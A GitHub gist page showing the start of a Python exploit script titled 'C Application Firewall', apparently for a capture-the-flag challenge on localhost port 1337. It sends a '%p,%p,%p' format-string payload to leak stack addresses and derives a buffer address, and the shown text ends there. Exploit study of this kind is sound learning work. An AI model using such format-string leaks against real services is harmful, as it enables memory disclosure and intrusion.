Skip to content

Instantly share code, notes, and snippets.

View rudranag's full-sized avatar

0xRudranag rudranag

  • 10:24 (UTC +05:30)
View GitHub Profile
@LiveOverflow
LiveOverflow / asd.py
Last active October 14, 2024 23:18
C Application Firewall
import struct
import socket
s = socket.socket()
s.connect(('127.0.0.1', 1337))
r = s.recv(1024)
s.send("%p,%p,%p\n")
while ',' not in r:
r = s.recv(1024)
start_buf = int(r.split(',')[1], 16)-9